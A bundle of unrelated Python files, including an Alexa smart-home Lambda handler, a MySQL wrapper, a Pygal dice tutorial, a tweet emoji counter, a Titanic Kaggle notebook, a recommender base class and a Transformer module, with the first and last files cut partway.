# Module-level logger and AWS IoT clients (reused across Lambda invocations).
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
iotDataClient = boto3.client('iot-data')
iotClient = boto3.client('iot')
def lambda_handler(event, context):
    """Route an incoming Alexa smart-home directive to its handler.

    Unhandled namespaces fall through and return None, as before.
    """
    logger.info('got event{}'.format(event))
    header = event['directive']['header']
    if header['namespace'] == 'Alexa.Discovery' and header['name'] == 'Discover':
        return handleDiscovery(context, event)
    if header['namespace'] == 'Alexa.PowerController':
        return handlePowerControl(context, event)
    #elif event['directive']['header']['namespace'] == 'Alexa.PowerLevelController':
    #    return handlePowerLevelControl(context, event)
    #elif (event['directive']['header']['namespace'] == 'Alexa' and
    #    event['directive']['header']['name'] == 'ReportState'):
    #    return handleState(context, event)
def handleDiscovery(context, event):
    """Answer an Alexa.Discovery/Discover directive.

    Lists the things in the 'SmartyPi4Home-Things' IoT thing group and maps
    each supported thing type to an Alexa endpoint description.
    """
    #get the things from SmartyPi4home group
    logger.info('got discovery request {}'.format(event))
    iotResponse = iotClient.list_things_in_thing_group(
        thingGroupName='SmartyPi4Home-Things',
        recursive=False,
        maxResults=25
    )
    logger.debug('available iot devices {}'.format(iotResponse))
    endpoints = []
    for thing in iotResponse['things']:
        thingDescription = iotClient.describe_thing(thingName=thing)
        logger.debug('processing thing {}'.format(thingDescription))
        if thingDescription['thingTypeName'] == 'SmartyPi4Home-Outlet':
            logger.debug('found smart outlet')
            # Outlets are exposed as Alexa LIGHT endpoints with on/off only.
            endpoints.append({
                'endpointId': thing,
                'friendlyName': thingDescription['attributes']['friendlyName'].replace('-',' '),
                'description': thingDescription['attributes']['friendlyName'].replace('-',' ') + ' controlled by ' + thing,
                'manufacturerName': 'SmartyPi4Home',
                "displayCategories": [
                    "LIGHT"
                ],
                'capabilities': [
                    {
                        'type': 'AlexaInterface',
                        'interface': 'Alexa.PowerController',
                        'version': '3',
                        'properties': {
                            'supported': [
                                {
                                    'name': 'powerState'
                                }
                            ],
                            'proactivelyReported': 'false',
                            'retrievable': 'false'
                        }
                    }
                ]
            })
        elif thingDescription['thingTypeName'] == 'SmartyPi4Home-Fan':
            # Fans are recognised but not exposed as endpoints yet.
            logger.debug('found smart fan')
        else:
            logger.error('Unable to handle thing type {}'.format(thingDescription['thingTypeName']))
    # Discovery response envelope echoing the request's messageId.
    return {
        'event': {
            'header': {
                'messageId': event['directive']['header']['messageId'],
                'name': 'Discover.Response',
                'namespace': 'Alexa.Discovery',
                'payloadVersion': '3'
            },
            'payload': {
                'endpoints': endpoints
            }
        }
    }
def handlePowerControl(context, event):
    """Handle an Alexa.PowerController TurnOn/TurnOff directive.

    Writes the desired power state to the device's IoT thing shadow and
    returns the Alexa response envelope.

    Raises:
        ValueError: if the directive name is neither 'TurnOn' nor 'TurnOff'.
    """
    device_id = event['directive']['endpoint']['endpointId']
    requestType = event['directive']['header']['name']
    if requestType == 'TurnOn':
        status = 'ON'
    elif requestType == 'TurnOff':
        status = 'OFF'
    else:
        # BUG FIX: previously `status` was left unbound here, so any other
        # directive name crashed with a NameError further down.
        raise ValueError('Unsupported PowerController directive: {}'.format(requestType))
    # Publish the desired state to the device shadow.
    response = iotDataClient.update_thing_shadow(
        thingName=device_id,
        payload=json.dumps({
            'state': {
                'desired': {
                    'status': status
                }
            }
        })
    )
    logger.info('received {}'.format(response))
    # PowerController response: reported property plus the response envelope.
    return {
        'context':{
            'properties':[
                {
                    'namespace': 'Alexa.PowerController',
                    'name': 'powerState',
                    'value': status
                }
            ]
        },
        'event': {
            'header': {
                'messageId': event['directive']['header']['messageId'],
                'name': 'Response',
                'namespace':'Alexa',
                'payloadVersion':'3'
            },
            'endpoint': {
                'endpointId': device_id
            },
            'payload': {}
        }
    }
def handleState(context, event):
    """Report the device's current power state from its IoT thing shadow.

    NOTE(review): this handler exists but its dispatch in lambda_handler is
    commented out — confirm whether it should be wired up.
    """
    logger.info('handling status request')
    endpointId = event['directive']['endpoint']['endpointId']
    response = iotDataClient.get_thing_shadow(
        thingName = endpointId
    )
    # The shadow document is returned as a streaming payload of JSON bytes.
    deviceShadow = json.loads(response['payload'].read())
    logger.info('current shadow {}'.format(deviceShadow))
    return {
        'context':{
            'properties':[
                {
                    'namespace':'Alexa.PowerController',
                    'name':'powerState',
                    # Last state the device actually reported to its shadow.
                    'value':deviceShadow['state']['reported']['status']
                }
            ]
        },
        'event':{
            'header':{
                'messageId':event['directive']['header']['messageId'],
                'namespace':'Alexa',
                'name':'StateReport',
                'payloadVersion':'3'
            },
            'endpoint':{
                'endpointId':endpointId
            },
            'payload':{}
        }
    }
|
from reverse.core import utils
from reverse.core._abstract import DatabaseAbstract, DatabaseType
#Gen
import mysql.connector
import json
class MysqlService(DatabaseAbstract):
    """MySQL-backed implementation of DatabaseAbstract (mysql-connector)."""

    NAME = DatabaseType.MYSQL

    def __init__(self) -> None:
        super().__init__()

    def _execute(self, operation: str, paramaters=None) -> any:
        """Execute *operation* on a fresh cursor, binding *paramaters* if given.

        BUG FIX: the parameters were accepted but never passed on to
        cursor.execute(); the mutable default list argument is also gone.
        Passing None when no parameters are supplied keeps the previous
        no-parameter behaviour.
        """
        return self.connection.cursor().execute(operation, paramaters if paramaters else None)

    def getCursor(self) -> any:
        """Return a new cursor on the open connection."""
        return self.connection.cursor()

    def createConnector(self, *args, **kwargs):
        """Open a mysql.connector connection, remember it, and return it."""
        self.connection = mysql.connector.connect(*args, **kwargs)
        return self.connection
# 当前版本 : python3.8.2
# 开发时间 : 2021/8/28 14:28
"""
在本节中,我们将使用Python可视化包Pygal来生成可缩放的矢量图形文件。
对于需要在尺寸不同的屏幕上显示的图表,这很有用,因为它们将自动缩放,以适合观看者的屏幕。
如果你打算以在线方式使用图表,请考虑使用Pygal来生成它们,这样它们在任何设备上显示时都会很美观。
在这个项目中,我们将对掷骰子的结果进行分析。掷6面的常规骰子时,可能出现的结果为1~6点,且出现每种结果的可能性相同。
然而,如果同时掷两个骰子,某些点数出现的可能性将比其他点数大。
为确定哪些点数出现的可能性最大,我们将生成一个表示掷骰子结果的数据集,并根据结果绘制出一个图形。
在数学领域,常常利用掷骰子来解释各种数据分析,但它在赌场和其他博弈场景中也得到了实际应用,在游戏《大富翁》以及众多角色扮演游戏中亦如此。
"""
# 4.1安装Pygal
# 4.2Pygal画廊
# 要了解使用Pygal可以创建什么样的图表,请查看图表类型画廊:
# 访问http://www.pygal.org/ ,单击Documentation,再单击Chart types。每个示例都包含源代码,让你知道这些图表是如何生成的。
# 4.3创建Die类
# 下面的类模拟掷一个骰子
"""
from random import randint
class Die:
#表示一个骰子的类
def __init__(self, num_sides=6):
#骰子默认为6面
self.num_sides = num_sides
def roll(self):
#返回一个位于1和骰子面数之间的随机值
return randint(1, self.num_sides)
方法__init__()接受一个可选参数。创建这个类的实例时,如果没有指定任何实参,面数默认为6;
如果指定了实参,这个值将用于设置骰子的面数。骰子是根据面数命名的,6面的骰子名为D6,8面的骰子名为D8,以此类推。
方法roll()使用函数randint()来返回一个1和面数之间的随机数。这个函数可能返回起始值1、终止值num_sides或这两个值之间的任何整数。
"""
# 4.4掷骰子
# 使用这个类来创建图表之前,先来掷D6骰子,将结果打印出来,并检查结果是否合理:
"""
from die import Die
# 创建一个D6
die = Die()
# 掷几次骰子,并将结果存储在一个列表中
results = []
for roll_num in range(100):
result = die.roll()
results.append(result)
print(results)
"""
# 4.5分析结果
# 为了分析掷一个D6骰子的结果,我们计算每个点数出现的次数
# 4.6绘制直方图
# 有了频率列表后,我们就可以绘制一个表示结果的直方图。直方图是一种条形图,指出了各种结果出现的频率。创建这种直方图的代码如下:
"""
# 对结果进行可视化
hist = pygal.Bar()
hist.title = "Results of rolling one D6 1000 times."
hist.x_labels = ['1', '2', '3', '4', '5', '6']
hist.x_title = "Result"
hist.y_title = "Frequency of Result"
hist.add('D6', frequencies)
hist.render_to_file('die_visual.svg')
为创建条形图,我们创建了一个pygal.Bar()实例,并将其存储在hist 中。
接下来,我们设置hist的属性title(用于标示直方图的字符串),将掷D6骰子的可能结果用作x轴的标签,并给每个轴都添加了标题。
使用add()将一系列值添加到图表中(向它传递要给添加的值指定的标签,还有一个列表,其中包含将出现在图表中的值)。
最后,将这个图表渲染为一个SVG文件,这种文件的扩展名必须为.svg。 要查看生成的直方图,最简单的方式是使用Web浏览器。
为此,在任何Web浏览器中新建一个标签页,再在其中打开文件die_visual.svg.
"""
# 4.7同时掷两个骰子
"""
同时掷两个骰子时,得到的点数更多,结果分布情况也不同。
下面来修改前面的代码,创建两个D6骰子,以模拟同时掷两个骰子的情况。
每次掷两个骰子时,我们都将两个骰子的点数相加,并将结果存储在results中。
复制die_visual.py并将其保存为dice_visual.py,再做如下修改:
见dice_visual
"""
# 4.8同时掷两个面数不同的骰子
# 下面来创建两个面数不同的骰子
|
# Sample data for the demo call below.
lst = [1, 3, 3, 5]


def modify_list(original_list):
    """Remove odd values from *original_list* in place, then halve the evens.

    BUG FIX: the original used list.index() while deleting/rewriting, which
    always targets the first duplicate and corrupts lists with repeated even
    values (e.g. [2, 4, 2] became [1, 1, 2] instead of [1, 2, 1]).  A slice
    assignment keeps the in-place mutation semantics.
    """
    original_list[:] = [value // 2 for value in original_list if value % 2 == 0]


modify_list(lst)
print(lst)
|
import logging

from . import Entity
class Experiment(Entity):
    """A single experiment: where and when it ran and who conducted it.

    Also records the scenario/application under test and the location each
    enabler was deployed to.
    """

    def __init__(self, site, date, conductor, place = None):
        self.site = site
        self.date = date
        # conductor is treated as a mapping with a 'name' key (see __repr__).
        self.conductor = conductor
        self.place = place
        # Filled in later via set_scenario().
        self.scenario = None
        self.application = None
        # enabler -> deployment location; first write wins, see
        # set_enabler_location().
        self.deployments = {}

    def set_scenario(self, scenario, application):
        """Record the scenario and the application it exercises."""
        self.scenario = scenario
        self.application = application

    def set_enabler_location(self, enabler, location):
        """Record where *enabler* was deployed; keep the first value on conflict."""
        if enabler in self.deployments:
            logging.warning("Ambiguous deployment information of %s during %s - using previous." % (enabler, self))
            return
        self.deployments[enabler] = location

    def __repr__(self):
        return "Experiment<%s, %s, %s>" % (self.site, self.date, self.conductor.get('name'))

    def get_site(self):
        return self.site

    def get_scenario(self):
        return self.scenario

    def get_application(self):
        return self.application

    def get_date(self):
        return self.date
|
import os
import zipfile
import csv
import json
import glob
import gzip
import json
import datetime
import demoji
import re
import pandas as pd
import emoji
def format_line(line):
    """Normalise a tweet: strip emoji, collapse @mentions to '@', URLs to 'url'."""
    without_emoji = demoji.replace(line)
    without_mentions = re.sub(r"(@\S*)", "@", without_emoji)
    return re.sub(r"https://\S*", "url", without_mentions)
def text_has_emoji(text):
    """Return True if any character of *text* is a known emoji."""
    return any(character in emoji.UNICODE_EMOJI for character in text)
# Accumulators for the scan over the gzipped tweet archives.
lst_lines = []
datadir = '/data-fast/corona_tweets/'
directory = glob.glob('/data-fast/corona_tweets/geoTwitter20-05-11.zip.gz')
lst_dates = []
lst_counts = []
lst_masks = []
lst_ids = []
lst_text = []
count_total = 0
count_english = 0
count_emojis = 0
for filename in sorted(directory):
    with gzip.open(filename, 'rb') as f:
        # Recover the date from the file name:
        # geoTwitterYY-MM-DD.zip.gz -> "20YY-MM-DD".
        name = os.path.basename(filename)
        name = name[:-7]
        name = name[10:]
        name = "20" + name
        date1 = datetime.datetime.strptime(name, "%Y-%m-%d")
        print(date1)
        count_day = 0
        # One JSON-encoded tweet per line.
        for line in f:
            tweet = json.loads(line)
            print(tweet['text'])
            count_total = count_total+1
            if tweet['lang'] == 'en':
                count_english = count_english+ 1
                # Count emojis among English tweets only.
                if text_has_emoji(tweet['text']):
                    count_emojis = count_emojis+1
#print("total emojis = " , count_emojis)
#print("total english = " ,count_english)
#print("total count = ",count_total)
|
import urllib
import re
# NOTE(review): Python 2 script (print statements, urllib.FancyURLopener).
opener = urllib.FancyURLopener({})
# Dates (MM-DD tokens) already seen.
day = []
def readme(url):
    # Fetch *url* and collect every unique MM-DD-looking token into `day`,
    # then print the collected tokens.
    count = 1
    f = opener.open(url)
    files = f.read()
    # Tokens shaped like two digits, a dash, two digits.
    links = re.findall(r'\d\d-\d\d', files)
    for i in links:
        #urllib.urlretrieve(i,str(count)+".zip")
        #print i
        if i not in day:
            print "cool"
            day.append(i)
            count += 1
    for i in day:
        print "links"
        print i
readme("http://stanford.edu/class/archive/cs/cs106b/cs106b.1142/lectures/")
|
#!/usr/bin/env python
# coding: utf-8
# In[ ]:
# This Python 3 environment comes with many helpful analytics libraries installed
# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python
# For example, here's several helpful packages to load in
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
import seaborn as sns
import matplotlib.pyplot as plt
# Input data files are available in the "../input/" directory.
# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory
import os
print(os.listdir("../input"))
# Any results you write to the current directory are saved as output.
# Load the Kaggle Titanic train/test splits.
titanic_train = pd.read_csv('../input/train.csv')
titanic_test = pd.read_csv('../input/test.csv')
titanic_train.head()
# In[ ]:
titanic_train.info()
# In[ ]:
#Using groupby, we can make tables computing survival rates of different group
by_sex = titanic_train.groupby('Sex')['Survived'].mean()
pd.DataFrame(by_sex)
#Female group's survival rate is 4 times larger than the male group's survival rate.
# In[ ]:
by_Pclass = titanic_train.groupby('Pclass')['Survived'].agg(['sum','count'])
by_Pclass['survival_rate'] = by_Pclass['sum'].divide(by_Pclass['count'])
by_Pclass
#The survival rate of Pclass 1 is 0.63, almost as three times that for Pclass 3.
# In[ ]:
by_sex_and_Pclass = titanic_train.groupby(['Sex', 'Pclass'])['Survived'].mean()
pd.DataFrame(by_sex_and_Pclass)
#Female group's survival rate is 4 times larger than the male group's survival rate.
# In[ ]:
#We can plot the tables above
fig, (ax1, ax2) = plt.subplots(1, 2)
sns.barplot(x='Sex', y='Survived', data=titanic_train, ax=ax1)
sns.barplot(x ='Sex', y ='Survived', hue='Pclass', data=titanic_train, ax=ax2)
# The survival rate of female is much higher than of male.
# The survival rate of passengers in class 3 is almost half of those in class 1, independent of sex.
# For the female group, the survival rate of passengers in class 2 is similar to those in class 1;
# while for the male group, it is much lower.
# In[ ]:
fig, (ax1, ax2) = plt.subplots(1, 2)
sns.barplot(x='Pclass', y='Survived', data=titanic_train, ax=ax1)
sns.barplot(x ='Pclass', y='Survived', hue='Sex', data = titanic_train, ax=ax2)
#The survival rate of passengers in class 1 is much higher than those in class 3.
#Females who stay in class 1 and 2 have very high rates of survival.
# In[ ]:
fig, (ax1, ax2) = plt.subplots(1, 2)
sns.boxplot(x='Survived', y='Age', data=titanic_train, ax=ax1)
sns.barplot(x='Survived', y ='Age', hue='Sex', data=titanic_train, ax=ax2)
#Looks like inside the survived group, the age quantiles of the male group and female group are very similar.
#For the dead group, the median age of the male group is a bit larger than the median age of the female group.
# In[ ]:
#It may be better to create age_range and compare survival rate among different age_range groups.
bins = [0, 5, 16, 30, 45, 60, 75, 80]
age_range = ['0-5', '5-16', '16-30','30-45', '45-60', '60-75', '75-']
titanic_train['age_range'] = pd.cut(titanic_train['Age'], bins, labels=age_range)
#Groupby age_range
by_age_range = titanic_train.groupby('age_range')['Survived'].mean()
print(by_age_range)
#Among the groups, the infant group has the highest survival rate at 70%. The 16-30 group has the lowest rate at 36%.
sns.barplot(x='age_range', y='Survived', data=titanic_train)
# In[ ]:
by_embarked = titanic_train.groupby(['Embarked', 'Sex'])['Survived'].mean()
by_embarked
#It is very interesting that males who embarked from C=Charbough has much higher rate of survival.
# In[ ]:
titanic_train.groupby(['Embarked', 'Sex'])['Name'].count()
#Nearly 2/3 of the sampled passengers embarked at S=Southampton.
# In[ ]:
titanic_train.groupby(['Embarked','Pclass'])['Name'].count()
#We can see that there is a correlation between Pclass and Embarked. For example, %50 of people who embarked at C=Cherbough
#are in class 1 while most of people who embarked at Q=Queenstown are in class 3.
# In[ ]:
#We now modify our dataset to make it more suitable for implementing some machine learning techniques.
#First, we need to fill in the missing age. There are only 714 available observations out of 891 datas.
#We will fill these NA (of both training and test datasets) by the age median groupby Pclass and Sex.
def fill_na_age(df):
    """Fill missing Age values with the median age of the (Sex, Pclass) group.

    Returns a new DataFrame (row order may change because of the merge) with
    no helper column left behind.
    """
    age_median_by_group = pd.DataFrame(df.groupby(['Sex', 'Pclass'])['Age'].median().reset_index())
    age_median_by_group.columns = ['Sex', 'Pclass', 'Median_age']
    df = pd.merge(df, age_median_by_group, on = ['Sex', 'Pclass'])
    df['Age'] = df['Age'].fillna(df['Median_age'])
    # BUG FIX: DataFrame.drop returns a new frame; the result was previously
    # discarded, so the Median_age helper column leaked into the output.
    df = df.drop('Median_age', axis=1)
    return df
# Fill missing ages in both splits using the group medians.
titanic_train = fill_na_age(titanic_train)
titanic_test = fill_na_age(titanic_test)
# In[ ]:
#Convert the Sex column into numerical variable, Embarked column into numerical variable
# NOTE(review): female is encoded as 10 (not 0/1) — deliberate weighting for
# the interaction features below? confirm.
titanic_train['Sex'] = titanic_train['Sex'].map({'female': 10, 'male': 1}).astype(int)
titanic_test['Sex'] = titanic_test['Sex'].map({'female': 10, 'male': 1}).astype(int)
# In[ ]:
#Make age_range column as a new categorical variable
def create_age_range(df):
    """Add an 'age_range' categorical column bucketing Age into fixed bins."""
    bin_edges = [0, 5, 16, 30, 45, 60, 75, 80]
    bucket_labels = ['0-5', '5-16', '16-30', '30-45', '45-60', '60-75', '75-']
    df['age_range'] = pd.cut(df['Age'], bin_edges, labels=bucket_labels)
    return df
titanic_train = create_age_range(titanic_train)
titanic_test = create_age_range(titanic_test)
#Change the age_range column as a new categorical variable
# Encode the age buckets as ordered integers 0..6.
titanic_train['age_range'] = titanic_train['age_range'].map({'0-5':0, '5-16':1, '16-30':2,'30-45':3, '45-60':4, '60-75':5, '75-':6}).astype(int)
titanic_test['age_range'] = titanic_test['age_range'].map({'0-5':0, '5-16':1, '16-30':2,'30-45':3, '45-60':4, '60-75':5, '75-':6}).astype(int)
# In[ ]:
#Change the Age column to int type
titanic_train['Age'] = titanic_train['Age'].astype(int)
titanic_test['Age'] = titanic_test['Age'].astype(int)
# In[ ]:
#Let's analyze SibSp and Parch by creating a new column Companion: counting the number of family members who were with the passenger.
titanic_train['Companion'] = titanic_train['SibSp'] + titanic_train['Parch']
# BUG FIX: the test-set feature was previously computed from the *train*
# columns (index-aligned garbage for the test rows).
titanic_test['Companion'] = titanic_test['SibSp'] + titanic_test['Parch']
titanic_train.groupby('Companion')[['Survived', 'Sex']].agg(['mean', 'count'])
#There is some correlation between Companion and Sex. Quite the majority of passengers do not have companion.
#Passengers without companion are 75% male, while passengers with 1 or 2 companions are only 50% male.
#The survival rate of each group (grouped by the number of companions) are also very different.
# In[ ]:
# We eliminate Passenger ID because they are probably not correlated with being survived or not. The Cabin column
# is very incomplete, only 204 data points. We finally also drop SibSp, Parch while keep Companion
train_var = ['Sex', 'Age', 'Pclass', 'Fare', 'Embarked', 'Companion', 'age_range', 'Survived']
titanic_train = titanic_train[train_var]
test_var = ['PassengerId', 'Sex', 'Age', 'Pclass', 'Fare', 'Embarked', 'age_range', 'Companion']
titanic_test = titanic_test[test_var]
titanic_train.head()
#In this training sample, the survived rate is 38.3%
#The mean age is 29.69.
#At least 75% of the sampled passengers are in class 2 or 3, with more than 50% are in class 3.
# In[ ]:
#Checking the test file, we see that there is a missing entry in Fare and two missing entries in Embarked.
#We will fill the NA in Fare with the median, while NA in Embarked in the most frequent entry in test.
titanic_test['Fare'] = titanic_test['Fare'].fillna(titanic_test['Fare'].median())
titanic_train['Embarked'] = titanic_train['Embarked'].fillna(titanic_train['Embarked'].dropna().mode()[0])
titanic_test['Embarked'] = titanic_test['Embarked'].fillna(titanic_test['Embarked'].mode()[0])
# In[ ]:
#Change the Embarked from a categorical variable to a numerical variable
titanic_train['Embarked'] = titanic_train['Embarked'].map({'C': 3,'Q': 2, 'S':1}).astype(int)
titanic_test['Embarked'] = titanic_test['Embarked'].map({'C': 3,'Q':2, 'S': 1}).astype(int)
# In[ ]:
# Add extra interaction features (Embarked*Sex and Pclass*Sex):
# BUG FIX: the test-set features below previously multiplied by the *train*
# Sex column instead of the test one.
titanic_train['Emb_Sex'] = titanic_train['Embarked']*titanic_train['Sex']
titanic_test['Emb_Sex'] = titanic_test['Embarked']*titanic_test['Sex']
titanic_train['P_sex'] = titanic_train['Pclass']*titanic_train['Sex']
titanic_test['P_sex'] = titanic_test['Pclass']*titanic_test['Sex']
# In[ ]:
from sklearn.linear_model import LogisticRegression
from sklearn.svm import SVC, LinearSVC
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.metrics import confusion_matrix
from sklearn.metrics import classification_report
from sklearn.metrics import roc_curve
from sklearn.metrics import roc_auc_score
from sklearn.model_selection import train_test_split
# In[ ]:
# Split features/target; the test set keeps PassengerId for the submission.
X_train = titanic_train.drop('Survived', axis=1)
Y_train = titanic_train['Survived']
X_test = titanic_test.drop('PassengerId', axis=1)
titanic_train.head()
# In[ ]:
score = {}
# Hold out 20% of the training data for a validation ROC curve.
X_tr, X_te, Y_tr, Y_te = train_test_split(X_train, Y_train , test_size = 0.2, random_state=1)
# Logistic Regression
logreg = LogisticRegression()
logreg.fit(X_tr, Y_tr)
Y_pred = logreg.predict(X_te)
Y_pred_prob = logreg.predict_proba(X_te)[:,1]
fpr, tpr, thresholds = roc_curve(Y_te, Y_pred_prob)
# Plot ROC curve
plt.plot([0, 1], [0, 1], 'k--')
plt.plot(fpr, tpr)
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('ROC Curve')
plt.show()
print(confusion_matrix(Y_pred, Y_te))
print(roc_auc_score(Y_te, Y_pred_prob))
# In[ ]:
# Refit on the full training data and write the Kaggle submission file.
log_regression = LogisticRegression()
log_regression.fit(X_train, Y_train)
Y_pred = log_regression.predict(X_test)
score['Logistic Regression'] = log_regression.score(X_train, Y_train)
my_submission = pd.DataFrame({'PassengerId': titanic_test['PassengerId'], 'Survived': Y_pred})
my_submission.to_csv('submission.csv', index=False)
# In[ ]:
#When I tried these models on the test set, the results were only 75%. Maybe we have overfitting problem. Let's take away a few columns
#that have strong correlation with other variables.
train_var = ['Sex', 'Age', 'Pclass', 'age_range', 'Survived']
titanic_train = titanic_train[train_var]
test_var = ['PassengerId', 'Sex', 'Age', 'Pclass', 'age_range']
titanic_test = titanic_test[test_var]
X_train = titanic_train.drop('Survived', axis=1)
Y_train = titanic_train['Survived']
X_test = titanic_test.drop('PassengerId', axis=1)
# In[ ]:
score = {}
# Logistic Regression on the reduced feature set.
logreg = LogisticRegression()
logreg.fit(X_train, Y_train)
Y_pred = logreg.predict(X_test)
score['LogisticRegression'] = logreg.score(X_train, Y_train)
# BUG FIX: y_test/y_pred were undefined names here (NameError); there are no
# labels for X_test, so report the confusion matrix and classification
# report on the training data instead.
Y_train_pred = logreg.predict(X_train)
print(confusion_matrix(Y_train, Y_train_pred))
print(classification_report(Y_train, Y_train_pred))
# In[ ]:
# Collect the training-set accuracy of each model in a small table.
result = pd.DataFrame([score]).T
result.columns = ['Score']
result
# In[ ]:
#SVC
svc = SVC()
svc.fit(X_train, Y_train)
Y_pred = svc.predict(X_test)
score['SVC'] = svc.score(X_train, Y_train)
#Linear SVC
Linear_svc = LinearSVC()
Linear_svc.fit(X_train, Y_train)
Y_pred = Linear_svc.predict(X_test)
score['LinearSVC'] = Linear_svc.score(X_train, Y_train)
#DecisionTreeClassifier
decision_tree = DecisionTreeClassifier()
decision_tree.fit(X_train, Y_train)
Y_pred = decision_tree.predict(X_test)
score['DecisionTreeClassifier'] = decision_tree.score(X_train, Y_train)
#RandomForest
random_forest = RandomForestClassifier()
random_forest.fit(X_train, Y_train)
Y_pred = random_forest.predict(X_test)
score['RandomForestClassifier'] = random_forest.score(X_train, Y_train)
#KNeighborsClassifier
knbor = KNeighborsClassifier()
knbor.fit(X_train, Y_train)
Y_pred = knbor.predict(X_test)
score['KneighborsClassifier'] = knbor.score(X_train, Y_train)
# In[ ]:
# NOTE: scores above are training accuracy, not held-out performance.
result = pd.DataFrame([score]).T
result.columns = ['Score']
result
# In[ ]:
# In[ ]:
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from sklearn.externals import six
from abc import ABCMeta, abstractmethod
from ..base import BaseRecommender
# Public API of this module.
__all__ = [
    'BaseCollaborativeFiltering'
]
class BaseCollaborativeFiltering(six.with_metaclass(ABCMeta, BaseRecommender)):
    """Abstract parent of every collaborative filtering recommender.

    Collaborative filtering algorithms learn their parameters purely from
    the ratings history of a system's users; the implementations in reclab
    therefore train on a ratings matrix and nothing else.
    """

    @abstractmethod
    def fit(self, X):
        """Train the recommender from the users' ratings history.

        Parameters
        ----------
        X : scipy.sparse.csr_matrix
            Sparse ratings matrix with users along the row axis and items
            along the column axis.  Entries are explicit ratings or other
            implicit ranking events (i.e., number of listens, etc.).
        """

    @staticmethod
    def _initialize_factors(estimator, n_users, n_items, factors,
                            dtype, random_state):
        """Seed the estimator's user/item factor matrices reproducibly.

        Implicit does not let us control the seeding of its factor
        matrices, but it does accept pre-built ones -- supplying our own is
        the only way to make results reproducible.
        """
        # XXX: the initialization strategy itself could become a tuning param.
        scale = 0.01
        for attr, n_rows in (("user_factors", n_users),
                             ("item_factors", n_items)):
            initial = random_state.rand(n_rows, factors).astype(dtype)
            setattr(estimator, attr, initial * scale)
        return estimator
class BaseMatrixFactorization(six.with_metaclass(ABCMeta,
                                                 BaseCollaborativeFiltering)):
    """Shared base for matrix-factorization collaborative filtering.

    Exists mainly so the recommendation-method documentation can live in a
    single place for all factorization-based models.
    """

    @abstractmethod
    def recommend_for_user(self, userid, R, n=10, filter_previously_rated=True,
                           filter_items=None, return_scores=False,
                           recalculate_user=False):
        """Produce recommendations for a single user.

        A user's recommendations are the product of his/her ratings history
        with the latent user and item factors extracted during training.

        Parameters
        ----------
        userid : int
            Positional index of the user along the row axis of the ratings
            matrix.

        R : scipy.sparse.csr_matrix
            Sparse ratings matrix of users (rows) by items (columns).

        n : int, optional (default=10)
            How many items to recommend for the user.

        filter_previously_rated : bool, optional (default=True)
            If True (the default), items the user has already rated are
            excluded from the result.

        filter_items : array-like or None, optional (default=None)
            Extra items to exclude from the recommend operation.

        return_scores : bool, optional (default=False)
            If True, also return the per-item scores for the user.

        recalculate_user : bool, optional (default=False)
            If True, recalculate the user factor before recommending.
        """
|
# Auto-generated paritybench scaffolding: registers submodule aliases and
# replaces I/O / CLI plumbing with mocks so the model classes below can be
# imported and exercised in isolation.
import sys
_module = sys.modules[__name__]
del sys
classifiers = _module
tree2tabular = _module
explainer = _module
plotter = _module
predictor = _module
train_fasttext = _module
train_flair = _module
train_transformer = _module
loader = _module
model = _module
from _paritybench_helpers import _mock_config, patch_functional
from unittest.mock import mock_open, MagicMock
from torch.autograd import Function
from torch.nn import Module
import abc, collections, copy, enum, functools, inspect, itertools, logging, math, matplotlib, numbers, numpy, pandas, queue, random, re, scipy, sklearn, string, tensorflow, time, torch, torchaudio, torchtext, torchvision, types, typing, uuid, warnings
import numpy as np
from torch import Tensor
patch_functional()
# `open`, yaml, logging, sys and argparse are all mocked so that importing
# this module has no filesystem or CLI side effects.
open = mock_open()
yaml = logging = sys = argparse = MagicMock()
ArgumentParser = argparse.ArgumentParser
# Every config-like global resolves to the same mock config object.
_global_config = args = argv = cfg = config = params = _mock_config()
argparse.ArgumentParser.return_value.parse_args.return_value = _global_config
yaml.load.return_value = _global_config
sys.argv = _global_config
__version__ = '1.0.0'
xrange = range
wraps = functools.wraps
import pandas as pd
from sklearn.metrics import f1_score
from sklearn.metrics import accuracy_score
import numpy as np
import scipy
import sklearn.pipeline
from typing import List
from typing import Any
import torch
from torch.utils.data import TensorDataset
from torch.utils.data import random_split
from torch.utils.data import DataLoader
from typing import Tuple
import torch.nn as nn
class Transformer(nn.Module):
    """Pre-LayerNorm Transformer stack.

    Token + learned position embeddings followed by ``num_layers`` blocks of
    (LayerNorm -> MultiheadAttention -> dropout -> residual) and
    (LayerNorm -> feed-forward -> dropout -> residual).  When ``causal`` is
    True, an upper-triangular mask blocks attention to future positions.
    """
    def __init__(self, embed_dim, hidden_dim, num_embeddings, num_max_positions, num_heads, num_layers, dropout, causal):
        super().__init__()
        self.causal = causal
        self.tokens_embeddings = nn.Embedding(num_embeddings, embed_dim)
        self.position_embeddings = nn.Embedding(num_max_positions, embed_dim)
        self.dropout = nn.Dropout(dropout)
        # Per-layer module lists, indexed in lock-step by forward()'s zip().
        self.attentions, self.feed_forwards = nn.ModuleList(), nn.ModuleList()
        self.layer_norms_1, self.layer_norms_2 = nn.ModuleList(), nn.ModuleList()
        for _ in range(num_layers):
            self.attentions.append(nn.MultiheadAttention(embed_dim, num_heads, dropout=dropout))
            self.feed_forwards.append(nn.Sequential(nn.Linear(embed_dim, hidden_dim), nn.ReLU(), nn.Linear(hidden_dim, embed_dim)))
            self.layer_norms_1.append(nn.LayerNorm(embed_dim, eps=1e-12))
            self.layer_norms_2.append(nn.LayerNorm(embed_dim, eps=1e-12))
    def forward(self, x, padding_mask=None):
        """ x has shape [seq length, batch], padding_mask has shape [batch, seq length] """
        positions = torch.arange(len(x), device=x.device).unsqueeze(-1)
        h = self.tokens_embeddings(x)
        h = h + self.position_embeddings(positions).expand_as(h)
        h = self.dropout(h)
        attn_mask = None
        if self.causal:
            # -inf above the diagonal: position i may not attend to j > i.
            attn_mask = torch.full((len(x), len(x)), -float('Inf'), device=h.device, dtype=h.dtype)
            attn_mask = torch.triu(attn_mask, diagonal=1)
